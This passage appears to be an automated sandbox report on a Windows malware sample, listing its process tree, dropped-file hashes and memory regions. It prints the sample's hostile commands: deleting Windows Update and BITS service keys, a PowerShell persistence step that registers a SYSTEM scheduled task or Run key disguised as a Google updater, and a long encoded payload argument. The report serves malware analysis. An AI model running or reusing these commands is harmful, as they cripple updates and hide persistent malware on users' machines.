C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe <#thakcjdi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Google' /tr '''C:\Program Files\Google\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Google' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Google" /t REG_SZ /f /d 'C:\Program Files\Google\chromeupdater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe wwahllplg2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe iulcjduawyyezjwe 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2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\chromeupdater.exe"C:\Program Files\Google\chromeupdater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\Google\chromeupdater.exeFilesize
9.1MB
MD52276c767a4e487885ab8d979c6e66878
SHA1fd7a9df4d7e68031109f4c7b5de6a0fc424c160e
SHA25637d4dbf6abbe35855e329fa4a955cec618781f8f90d223c988fb205304fe2317
SHA5124f51cf617bfd006f86d0fa89b2ded7dc7ebdece8715313fd43bd1560e0d58a1e997dda15ba2df1ad140cdd8af4403628ea8f3967439d7774435f8f43ad7abc1b
-
C:\Program Files\Google\chromeupdater.exeFilesize
9.1MB
MD52276c767a4e487885ab8d979c6e66878
SHA1fd7a9df4d7e68031109f4c7b5de6a0fc424c160e
SHA25637d4dbf6abbe35855e329fa4a955cec618781f8f90d223c988fb205304fe2317
SHA5124f51cf617bfd006f86d0fa89b2ded7dc7ebdece8715313fd43bd1560e0d58a1e997dda15ba2df1ad140cdd8af4403628ea8f3967439d7774435f8f43ad7abc1b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57165d1b9fd1ae46063c336fd4133d20a
SHA17753b95417d8f6a0b31843db2284aaeea8a2f67e
SHA256be3e660b1dce210f9ee874725ccf4c91e8b66ee1af34326fba74f17327a0478d
SHA512eff15ca037dbd9a994eafeb6d3136cb41396698d41184e1c9e53ab7614f8cac65f80cbde60dbcffcb2e328033e66653fbbb5f3c8fc7e61b4e3f74db1e3f307fb
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED.exeFilesize
325KB
MD5038f548b46e0ef89dc476557407e7b4b
SHA118546d1fe05f4aee0313ff7fb805f8a51d65f145
SHA256ff953ecfb1f82e587aa25c29d980f0875c9c9e5b2c9a3e13d87e91a551be9f45
SHA5123dba1ffa622ae1c3b76f12c12e50984ddcfdae288fd234ef93784af2524b8646bdf3e95204ab57f4153779e7766d8bbb66e50e0c68e8adba752056d2655670f3
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED.exeFilesize
325KB
MD5038f548b46e0ef89dc476557407e7b4b
SHA118546d1fe05f4aee0313ff7fb805f8a51d65f145
SHA256ff953ecfb1f82e587aa25c29d980f0875c9c9e5b2c9a3e13d87e91a551be9f45
SHA5123dba1ffa622ae1c3b76f12c12e50984ddcfdae288fd234ef93784af2524b8646bdf3e95204ab57f4153779e7766d8bbb66e50e0c68e8adba752056d2655670f3
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exeFilesize
7.5MB
MD5f49731a7439fd1c0bd9b1ca479372985
SHA126c9aec52acacb8c2573577b721ed1cb74cfdb30
SHA2563b6661895ec7cf5f8275093791322e6c05f28583a49ffc88e0e28fe6b1450972
SHA5128887062cd5505a5073f2b819d08041c0151c054955c1912bf6ff450c03f08e29c40ef0ff135546c73793a59b5e11eaabd7956b1bd3f3f94f4fbc30ab0b73816a
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exeFilesize
9.1MB
MD5223ce6bb95cc6072b3c08cdcdf6b2944
SHA1a55afd57e0862347574680bda2ea42ccb6c31bce
SHA25639cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62
SHA512a34ecf9dc5dae22f37d3697a5c4050261ca98f22f3f88108c9c63f02911fe64ed1be9b8608211b8440cb19fd5dbac423d1bbe1c5e70f2e31f0043b8ebbd4daa6
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exeFilesize
9.1MB
MD5223ce6bb95cc6072b3c08cdcdf6b2944
SHA1a55afd57e0862347574680bda2ea42ccb6c31bce
SHA25639cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62
SHA512a34ecf9dc5dae22f37d3697a5c4050261ca98f22f3f88108c9c63f02911fe64ed1be9b8608211b8440cb19fd5dbac423d1bbe1c5e70f2e31f0043b8ebbd4daa6
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD57aa727c416bcf0287c76aec520a41a23
SHA15f770c8fb6be09cf11d7ee8e2e320278a167172f
SHA25639f607fbb5bfcfc5c394645fd9b718de1c714b363b17a4dd992ef2084eda8e53
SHA512ce032701727b0c1e5945e1fde4e4dbc8e48be60dba71377e3741b80f74951c023a4d8e633d1ff1087054e5aba2764d9af97cc3ff6529a98be1907834ec3a78e6
-
memory/208-196-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/208-197-0x000001A1AF3F0000-0x000001A1AF3FA000-memory.dmpFilesize
40KB
-
memory/208-198-0x000001A1AF560000-0x000001A1AF57C000-memory.dmpFilesize
112KB
-
memory/208-199-0x000001A1AF540000-0x000001A1AF54A000-memory.dmpFilesize
40KB
-
memory/208-200-0x000001A1AF5A0000-0x000001A1AF5BA000-memory.dmpFilesize
104KB
-
memory/208-204-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/208-203-0x000001A1AF590000-0x000001A1AF59A000-memory.dmpFilesize
40KB
-
memory/208-202-0x000001A1AF580000-0x000001A1AF586000-memory.dmpFilesize
24KB
-
memory/208-195-0x000001A1AF310000-0x000001A1AF32C000-memory.dmpFilesize
112KB
-
memory/208-201-0x000001A1AF550000-0x000001A1AF558000-memory.dmpFilesize
32KB
-
memory/320-143-0x0000028071D30000-0x0000028071D52000-memory.dmpFilesize
136KB
-
memory/320-138-0x0000000000000000-mapping.dmp
-
memory/320-161-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/320-153-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/400-178-0x0000000000000000-mapping.dmp
-
memory/1016-175-0x0000000000000000-mapping.dmp
-
memory/1104-174-0x0000000000000000-mapping.dmp
-
memory/1388-171-0x0000000000000000-mapping.dmp
-
memory/1472-228-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmpFilesize
8.0MB
-
memory/1472-227-0x0000025B39F50000-0x0000025B39F70000-memory.dmpFilesize
128KB
-
memory/1472-229-0x0000025B3A200000-0x0000025B3A240000-memory.dmpFilesize
256KB
-
memory/1472-230-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmpFilesize
8.0MB
-
memory/1472-231-0x0000025B39FD0000-0x0000025B39FF0000-memory.dmpFilesize
128KB
-
memory/1472-224-0x00007FF6E0522120-mapping.dmp
-
memory/1624-182-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/1624-181-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/1680-187-0x0000000000000000-mapping.dmp
-
memory/1756-206-0x0000000000000000-mapping.dmp
-
memory/1796-139-0x0000000000000000-mapping.dmp
-
memory/1876-142-0x0000000000000000-mapping.dmp
-
memory/2080-135-0x0000000000190000-0x0000000001296000-memory.dmpFilesize
17.0MB
-
memory/2080-137-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/2080-136-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/2080-152-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/2256-160-0x0000000000000000-mapping.dmp
-
memory/2256-165-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/2256-166-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/2328-216-0x0000000000000000-mapping.dmp
-
memory/2492-155-0x00007FF79FF00000-0x00007FF7A0EDC000-memory.dmpFilesize
15.9MB
-
memory/2492-145-0x0000000000000000-mapping.dmp
-
memory/2492-183-0x00007FF79FF00000-0x00007FF7A0EDC000-memory.dmpFilesize
15.9MB
-
